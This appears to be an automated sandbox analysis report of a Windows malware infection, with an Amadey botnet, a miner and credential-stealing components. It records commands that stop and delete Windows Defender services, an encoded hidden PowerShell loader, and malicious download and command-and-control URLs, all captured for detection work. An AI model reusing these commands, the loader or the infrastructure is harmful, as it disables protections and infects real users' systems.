no specs sc.exe no specs sc.exe no specs sc.exe no specs reg.exe no specs sc.exe no specs sc.exe no specs sc.exe no specs reg.exe no specs sc.exe no specs sc.exe no specs sc.exe no specs reg.exe no specs sc.exe no specs sc.exe no specs sc.exe no specs reg.exe no specs sc.exe no specs sc.exe no specs sc.exe no specs reg.exe no specs sc.exe no specs sc.exe no specs sc.exe no specs reg.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs unlocker.exe no specs powershell.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs sc.exe no specs cmd.exe no specs conhost.exe no specs taskkill.exe no specs 0vbswas.exe no specs sc.exe no specs 0vbswas.exe sc.exe no specs msiexec.exe msiexec.exe no specs schtasks.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs reagentc.exe no specs f4wxlzt.exe net.exe no specs conhost.exe no specs net1.exe no specs f4wxlzt.exe net.exe no specs conhost.exe no specs net1.exe no specs powershell.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs takeown.exe no specs cmd.exe no specs conhost.exe no specs icacls.exe no specs cmd.exe no specs conhost.exe no specs icacls.exe no specs powercfg.exe no specs conhost.exe no specs powercfg.exe no specs conhost.exe no specs powercfg.exe no specs conhost.exe no specs powercfg.exe no specs conhost.exe no specs powercfg.exe no specs conhost.exe no specs powercfg.exe no specs conhost.exe no specs powercfg.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs ping.exe no specs cmd.exe conhost.exe no specs msiexec.exe no specs rundll32.exe powershell.exe no specs 4ujdiqw.exe vssvc.exe no specs rr7dazp.exe powershell.exe no specs msiexec.exe no specs #MINER cmd.exe powershell.exe no specs conhost.exe no specs a1dc82b0f5.exe ramez.exe no specs e14ba8a1cd.exe no specs cmd.exe no specs conhost.exe no specs slui.exe cmd.exe no specs conhost.exe no specs chcp.com no specs #CREDENTIALFLUSHER 025bbbe2e0.exe no specs taskkill.exe no specs conhost.exe no specs reg.exe no specs nircmd.exe no specs cmd.exe conhost.exe no specs cmd.exe no specs conhost.exe no specs svchost.exe no specs cmd.exe no specs powershell.exe no specs 87657ff2a9.exe no specs cmd.exe no specs mshta.exe no specs taskkill.exe no specs conhost.exe no specs conhost.exe no specs conhost.exe no specs schtasks.exe no specs powershell.exe taskkill.exe no specs conhost.exe no specs conhost.exe no specs chcp.com no specs taskkill.exe no specs conhost.exe no specs 862fe2c2fe.exe no specs taskkill.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs #CREDENTIALFLUSHER firefox.exe no specs firefox.exe chcp.com no specs reg.exe no specs reg.exe no specs nircmd.exe no specs reg.exe no specs #GCLEANER babed18502.exe firefox.exe no specs temp52qsonuyp5r9whvek7ahnrhira0falk6.exe no specs firefox.exe no specs firefox.exe no specs firefox.exe no specs nsudolg.exe no specs taskkill.exe no specs cmd.exe firefox.exe no specs firefox.exe no specs firefox.exe no specs firefox.exe no specs firefox.exe no specs cmd.exe conhost.exe no specs conhost.exe no specs win-v31.exe 150905c671.exe no specs conhost.exe no specs cmd.exe no specs werfault.exe no specs conhost.exe no specs msbuild.exe firefox.exe no specs cmd.exe no specs conhost.exe no specs chcp.com no specs 97d11a216f.exe 97d11a216f.tmp chcp.com no specs THREAT putty.exe no specs core.exe no specs info.exe conhost.exe no specs taskkill.exe no specs conhost.exe no specs taskkill.exe no specs conhost.exe no specs taskkill.exe no specs conhost.exe no specs reg.exe no specs ramez.exe no specs reg.exe no specs taskkill.exe no specs conhost.exe no specs reg.exe no specs nsudolg.exe no specs #CREDENTIALFLUSHER firefox.exe no specs firefox.exe no specs cmd.exe conhost.exe no specs reg.exe no specs cmd.exe no specs mode.com no specs conhost.exe no specs cmd.exe no specs chcp.com no specs reg.exe no specs reg.exe no specs find.exe reg.exe no specs mode.com no specs cmd.exe no specs reg.exe no specs find.exe no specs cmd.exe no specs werfault.exe no specs tasklist.exe no specs taskkill.exe no specs conhost.exe no specs cmd.exe no specs tasklist.exe no specs openwith.exe taskkill.exe no specs conhost.exe no specs taskkill.exe no specs conhost.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs taskkill.exe no specs conhost.exe no specs taskkill.exe no specs reg.exe no specs conhost.exe no specs reg.exe no specs reg.exe no specs #CREDENTIALFLUSHER firefox.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs firefox.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs find.exe no specs reg.exe no specs reg.exe no specs cmd.exe no specs reg.exe no specs reg.exe no specs findstr.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs 7z.exe reg.exe no specs taskkill.exe no specs unlocker.exe no specs reg.exe no specs conhost.exe no specs reg.exe no specs reg.exe no specs find.exe no specs cmd.exe no specs conhost.exe no specs cmd.exe no specs findstr.exe no specs sc.exe no specs 7z.exe no specs unlocker.exe no specs cmd.exe no specs conhost.exe no specs cmd.exe no specs taskkill.exe no specs conhost.exe no specs sc.exe no specs sc.exe no specs sc.exe no specs sc.exe no specs taskkill.exe no specs cmd.exe no specs conhost.exe no specs reg.exe no specs taskkill.exe no specs sc.exe no specs sc.exe no specs sc.exe no specs reg.exe no specs sc.exe no specs conhost.exe no specs sc.exe no specs sc.exe no specs reg.exe no specs sc.exe no specs sc.exe no specs sc.exe no specs reg.exe no specs sc.exe no specs sc.exe no specs sc.exe no specs reg.exe no specs sc.exe no specs sc.exe no specs sc.exe no specs reg.exe no specs sc.exe no specs sc.exe no specs sc.exe no specs reg.exe no specs sc.exe no specs sc.exe no specs sc.exe no specs reg.exe no specs sc.exe no specs sc.exe no specs sc.exe no specs taskkill.exe no specs conhost.exe no specs sc.exe no specs sc.exe no specs reg.exe no specs sc.exe no specs sc.exe no specs sc.exe no specs reg.exe no specs sc.exe no specs reg.exe no specs sc.exe no specs sc.exe no specs sc.exe no specs sc.exe no specs sc.exe no specs sc.exe no specs reg.exe no specs taskkill.exe no specs reg.exe no specs conhost.exe no specs sc.exe no specs sc.exe no specs sc.exe no specs sc.exe no specs sc.exe no specs reg.exe no specs sc.exe no specs reg.exe no specs sc.exe no specs sc.exe no specs sc.exe no specs sc.exe no specs sc.exe no specs reg.exe no specs sc.exe no specs sc.exe no specs sc.exe no specs reg.exe no specs sc.exe no specs sc.exe no specs reg.exe no specs sc.exe no specs sc.exe no specs sc.exe no specs taskkill.exe no specs sc.exe no specs conhost.exe no specs sc.exe no specs reg.exe no specs sc.exe no specs reg.exe no specs sc.exe no specs sc.exe no specs sc.exe no specs sc.exe no specs reg.exe no specs sc.exe no specs sc.exe no specs reg.exe no specs sc.exe no specs sc.exe no specs sc.exe no specs #CREDENTIALFLUSHER firefox.exe no specs reg.exe no specs sc.exe no specs sc.exe no specs sc.exe no specs firefox.exe no specs sc.exe no specs reg.exe no specs sc.exe no specs sc.exe no specs reg.exe no specs sc.exe no specs sc.exe no specs sc.exe no specs sc.exe no specs reg.exe no specs sc.exe no specs reg.exe no specs sc.exe no specs sc.exe no specs sc.exe no specs reg.exe no specs sc.exe no specs sc.exe no specs sc.exe no specs reg.exe no specs sc.exe no specs sc.exe no specs sc.exe no specs schtasks.exe no specs reg.exe no specs sc.exe no specs sc.exe no specs sc.exe no specs reg.exe no specs schtasks.exe no specs sc.exe no specs sc.exe no specs schtasks.exe no specs sc.exe no specs reg.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs reg.exe no specs schtasks.exe no specs reg.exe no specs reg.exe no specs schtasks.exe no specs reg.exe no specs schtasks.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs unlocker.exe no specs reg.exe no specs reg.exe no specs unlocker.exe no specs cmd.exe no specs conhost.exe no specs cmd.exe no specs sc.exe no specs conhost.exe no specs sc.exe no specs cmd.exe no specs conhost.exe no specs taskkill.exe no specs sc.exe no specs sc.exe no specs chrome.exe taskkill.exe no specs conhost.exe no specs chrome.exe no specs cmd.exe no specs conhost.exe no specs taskkill.exe no specs chrome.exe no specs chrome.exe chrome.exe no specs chrome.exe no specs chrome.exe no specs sc.exe no specs chrome.exe no specs sc.exe no specs taskkill.exe no specs conhost.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs powershell.exe no specs conhost.exe no specs ramez.exe no specs taskkill.exe no specs conhost.exe no specs taskkill.exe no specs conhost.exe no specs taskkill.exe no specs conhost.exe no specs #CREDENTIALFLUSHER firefox.exe no specs firefox.exe firefox.exe no specs firefox.exe no specs firefox.exe no specs chrome.exe chrome.exe no specs firefox.exe no specs chrome.exe no specs chrome.exe firefox.exe no specs firefox.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs firefox.exe no specs firefox.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs ramez.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
136reg delete "HKLM\System\CurrentControlset\Services\MsSecWfp" /fC:\Windows\System32\reg.execmd.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Registry Console Tool
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\reg.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
300reg query "HKLM\System\CurrentControlSet\Services\WdFilter" C:\Windows\System32\reg.execmd.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Registry Console Tool
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\reg.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
456sc stop "MsSecFlt" C:\Windows\System32\sc.execmd.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Service Control Manager Configuration Tool
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\sc.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
c:\windows\system32\bcrypt.dll
516"C:\Windows\System32\cmd.exe" /c sc query IObitUnlockerC:\Windows\System32\cmd.exeUnlocker.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows Command Processor
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\aclayers.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
616\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Console Window Host
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
632sc delete "webthreatdefsvc" C:\Windows\System32\sc.execmd.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Service Control Manager Configuration Tool
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\sc.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
c:\windows\system32\bcrypt.dll
664"powershell" -NoP -W Hidden -E JABlAG4AdgBfAEUAawB3AEMAbgBrAD0AIgBQAEUAbwBxAEIARAB3AFUARQBCAGsASwBLAHcANQBEAE8ASABFAFAAUwB3AG8AQQBPAGgAcwA5AFMAUwBVAEIAUABBADAASwBXAGoAcwBVAEkAVQBJAGcATwBrAGsAdQBQAEIAYwBsAFgARAAwADAARQBrAEEARgBCAGkARgBCAEMAawBvAHAAQwB4AFUARABjAEMAawA5AFUAWABWAEIATwBCAFIAcwBXAGkAQQA4AFAAZwBjAEYATwBYAEEAagBQAEMAVQBHAFQARABzAFUAQQAxADAASwBGAEMANABaAEIAawBnAFUAQwBoAE0AMgBFAGcARQA0AGMAUwBFAEEAQwBrAHMAVQBHAGoAMABXAEEAdwBVADcASgBDAE4AUwBLAHoAbwA5AGQAUwBZAFYAQQBEAG8AOABTAEIAYwBVAFAARgBJADgAWABUAHMARQBhAEUARQBMAEUAQgBzAEMARgBRAE0AQQBHAFEAawBPAEUAawB3ADQASwBoAHQAaQBEAFMANQBOAEwAagB3AEQAQQBCAGsASgBVAFMAaABBAE8AdwBSAGcAQQBqAHgASwBLAGwAawA5AFAAUgBRAEsARABDAFEAbwBYAGoAcwBFAEQAMABRAD0AIgA7ACQAZABhAHQAYQBfAEYAbQBBAHMASABSAGYAPQAiAGkAeQB4AGwAXwB6AEEAbQBfAGMARAA1AGEAQwBZADEAIgA7ACQAdgBhAGwAXwBpAHIARgBMAGgAYQA9AFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABlAG4AdgBfAEUAawB3AEMAbgBrACkAOwAgACQAZABhAHQAYQBfAEsATABxAGsAPQAiACIAOwAgAGYAbwByACgAJABjAGYAZwBfAFIAeQBJAE4ARQA9ADAAOwAgACQAYwBmAGcAXwBSAHkASQBOAEUAIAAtAGwAdAAgACQAdgBhAGwAXwBpAHIARgBMAGgAYQAuAEwAZQBuAGcAdABoADsAIAAkAGMAZgBnAF8AUgB5AEkATgBFACsAKwApACAAewAgACQAZABhAHQAYQBfAEsATABxAGsAKwA9AFsAYwBoAGEAcgBdACgAdgBhAGwAXwBpAHIARgBMAGgAYQBbACQAYwBmAGcAXwBSAHkASQBOAEUAXQAtAGIAeABvAHIAWwBiAHkAdABlAF0AZABhAHQAYQBfAEYAbQBBAHMASABSAGYAWwAkAGMAZgBnAF8AUgB5AEkATgBFACUAZABhAHQAYQBfAEYAbQBBAHMASABSAGYALgBMAGUAbgBnAHQAaABdACkAOwAgAH0AOwAgACQAYwBtAGQAPQBbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAZABhAHQAYQBfAEsATABxAGsAKQApADsAIAAkAGMAZgBnAF8AVgBjAFkAagBMAGIAawA9AFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAJABjAG0AZAApADsAIAAmACAAJABjAGYAZwBfAFYAYwBZAGoATABiAGsAC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeF4WXLzT.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
720\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
812\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Console Window Host
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
856sc stop "webthreatdefusersvc" C:\Windows\System32\sc.execmd.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Service Control Manager Configuration Tool
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\sc.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
c:\windows\system32\bcrypt.dll
Total events
153 957
Read events
152 889
Write events
809
Delete events
259

Modification events

(PID) Process:(2244) 1m75c4.exeKey:HKEY_CURRENT_USER\SOFTWARE\Enigma Protector\BB3DF1FDBB935E9B-50AFA6E27F8A32AF\1D23E801FF916F1C-DF69CE3484AE41BB
Operation:writeName:AEF6E8B3
Value:
131F8A4BC3DE68A2588FC0B83747
(PID) Process:(6644) nircmd.exeKey:HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
Operation:writeName:C:\WINDOWS\System32\cmd.exe.FriendlyAppName
Value:
Windows Command Processor
(PID) Process:(6644) nircmd.exeKey:HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
Operation:writeName:C:\WINDOWS\System32\cmd.exe.ApplicationCompany
Value:
Microsoft Corporation
(PID) Process:(2088) reg.exeKey:HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\Personalize
Operation:writeName:AppsUseLightTheme
Value:
0
(PID) Process:(1300) reg.exeKey:HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\Personalize
Operation:writeName:AppsUseLightTheme
Value:
0
(PID) Process:(3240) ramez.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content
Operation:writeName:CachePrefix
Value:
(PID) Process:(3240) ramez.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
Operation:writeName:CachePrefix
Value:
Cookie:
(PID) Process:(3240) ramez.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History
Operation:writeName:CachePrefix
Value:
Visited:
(PID) Process:(7460) Unlocker.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\DK
Operation:writeName:CurrentDiskSize
Value:
228871622656
(PID) Process:(5400) dllhost.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer
Operation:writeName:SlowContextMenuEntries
Value:
6024B221EA3A6910A2DC08002B30309D0A010000BD0E0C47735D584D9CEDE91E22E23282770100000114020000000000C0000000000000468D0000006078A409B011A54DAFA526D86198A780390100009AD298B2EDA6DE11BA8CA68E55D895936E000000
Executable files
77
Suspicious files
305
Text files
119
Unknown types
2

Dropped files

PID
Process
Filename
Type
22441m75c4.exeC:\Users\admin\AppData\Local\Temp\Work\cecho.exeexecutable
MD5:E783BC59D0ED6CFBD8891F94AE23D1B3
SHA256:5C1211559DDA10592CFEDD57681F18F4A702410816D36EDA95AEE6C74E3C6A47
22441m75c4.exeC:\Users\admin\AppData\Local\Temp\Work\nircmd.exeexecutable
MD5:4A9DA765FD91E80DECFD2C9FE221E842
SHA256:2E81E048AB419FDC6E5F4336A951BD282ED6B740048DC38D7673678EE3490CDA
20962W3507.exeC:\Windows\Tasks\ramez.jobbinary
MD5:0B11D6DAAAE39BCF2C6BC3DC538AC1C2
SHA256:3027D9B421118B2FE140417947B6FCD6B89C54D99D9D8668E6F5CE61C3704414
1244powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_rfevxkmh.nk3.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
4688ie.exeC:\Users\admin\AppData\Local\Temp\IXP000.TMP\1m75c4.exeexecutable
MD5:117E92EFAEB6E9CE06D12865A522E455
SHA256:B14707AAEBB5AEDA520E63A3B327F3A14CAE0B477FC20E4F6906358BC3880A82
74407z.exeC:\Users\admin\AppData\Local\Temp\Work\Unlocker.exeexecutable
MD5:49C7A62751050E4B46822CE25AF57E6F
SHA256:2EA997FB5896EBD2CBBCDEA7995DBB871F2358BF0BFF9470801845879506CE44
3240ramez.exeC:\Users\admin\AppData\Local\Microsoft\Windows\INetCache\IE\RR3E01RZ\fOj0r8O[1].exeexecutable
MD5:FE0390B9AC1AF4FEFEF655D9FF3836EC
SHA256:0873A85D274D36616E45C87C4C1B77E4C9991A3DBA36158013E63E81283FE401
7872Unlocker.exeC:\Windows\Temp\IObitUnlocker\IObitUnlocker.dllexecutable
MD5:2C6233C8DBC560027EE1427F5413E4B1
SHA256:37D2A1626DC205D60F0BEC8746AB256569267E4EF2F8F84DFF4D9D792AA3AF30
3240ramez.exeC:\Users\admin\AppData\Local\Temp\10073550101\fOj0r8O.exeexecutable
MD5:FE0390B9AC1AF4FEFEF655D9FF3836EC
SHA256:0873A85D274D36616E45C87C4C1B77E4C9991A3DBA36158013E63E81283FE401
22441m75c4.exeC:\Users\admin\AppData\Local\Temp\Work\DKTolz.zipcompressed
MD5:16BAE3B5854B7D1B5E9C216ACFB651A7
SHA256:FCA2ED21F6A232FE7297A02DFB2DC31EB86F1ACDF0C943A672870283D4F26E55
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
107
TCP/UDP connections
196
DNS requests
203
Threats
77

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
GET
200
2.16.164.65:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
3240
ramez.exe
POST
200
185.156.72.96:80
http://185.156.72.96/te4h2nus/index.php
unknown
malicious
GET
200
95.101.149.131:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
3240
ramez.exe
GET
200
185.156.72.121:80
http://185.156.72.121/files/6022585298/fOj0r8O.exe
unknown
unknown
3240
ramez.exe
POST
200
185.156.72.96:80
http://185.156.72.96/te4h2nus/index.php
unknown
malicious
3240
ramez.exe
GET
200
185.156.72.121:80
http://185.156.72.121/files/6003232782/otxb4XB.exe
unknown
unknown
3240
ramez.exe
POST
200
185.156.72.96:80
http://185.156.72.96/te4h2nus/index.php
unknown
malicious
3240
ramez.exe
POST
200
185.156.72.96:80
http://185.156.72.96/te4h2nus/index.php
unknown
malicious
3240
ramez.exe
POST
200
185.156.72.96:80
http://185.156.72.96/te4h2nus/index.php
unknown
malicious
3240
ramez.exe
GET
200
185.156.72.121:80
http://185.156.72.121/files/5964778733/fV8FBMo.exe
unknown
unknown
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:137
whitelisted
2104
svchost.exe
20.73.194.208:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
4
System
192.168.100.255:138
whitelisted
20.73.194.208:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
2.16.164.65:80
crl.microsoft.com
Akamai International B.V.
NL
whitelisted
95.101.149.131:80
www.microsoft.com
Akamai International B.V.
NL
whitelisted
2112
svchost.exe
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
3216
svchost.exe
172.211.123.250:443
client.wns.windows.com
MICROSOFT-CORP-MSN-AS-BLOCK
FR
whitelisted
6544
svchost.exe
20.190.160.128:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
3240
ramez.exe
185.156.72.96:80
Tov Vaiz Partner
RU
malicious

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 20.73.194.208
  • 40.127.240.158
  • 4.231.128.59
whitelisted
crl.microsoft.com
  • 2.16.164.65
  • 2.16.164.33
  • 2.16.164.89
  • 2.16.164.83
  • 2.16.164.57
  • 2.16.164.27
  • 2.16.164.41
  • 2.16.164.91
  • 2.16.164.75
whitelisted
www.microsoft.com
  • 95.101.149.131
  • 23.35.229.160
whitelisted
google.com
  • 142.250.185.110
whitelisted
client.wns.windows.com
  • 172.211.123.250
  • 172.211.123.249
whitelisted
login.live.com
  • 20.190.160.128
  • 20.190.160.130
  • 20.190.160.17
  • 40.126.32.136
  • 20.190.160.4
  • 40.126.32.68
  • 20.190.160.64
  • 20.190.160.66
whitelisted
ocsp.digicert.com
  • 2.23.77.188
  • 2.17.190.73
whitelisted
orjinalecza.net
malicious
eczakozmetik.net
malicious
orijinalecza.org
malicious

Threats

PID
Process
Class
Message
3240
ramez.exe
Malware Command and Control Activity Detected
BOTNET [ANY.RUN] Amadey HTTP POST Request (st=s)
3240
ramez.exe
Misc Attack
ET DROP Spamhaus DROP Listed Traffic Inbound group 33
3240
ramez.exe
Malware Command and Control Activity Detected
ET MALWARE Amadey CnC Response
3240
ramez.exe
Potentially Bad Traffic
ET INFO Executable Download from dotted-quad Host
3240
ramez.exe
Misc Attack
ET DROP Spamhaus DROP Listed Traffic Inbound group 33
3240
ramez.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
3240
ramez.exe
Potentially Bad Traffic
ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response
3240
ramez.exe
Potential Corporate Privacy Violation
ET INFO PE EXE or DLL Windows file download HTTP
3240
ramez.exe
Potentially Bad Traffic
ET INFO Executable Download from dotted-quad Host
3240
ramez.exe
Potentially Bad Traffic
ET INFO Executable Download from dotted-quad Host
No debug info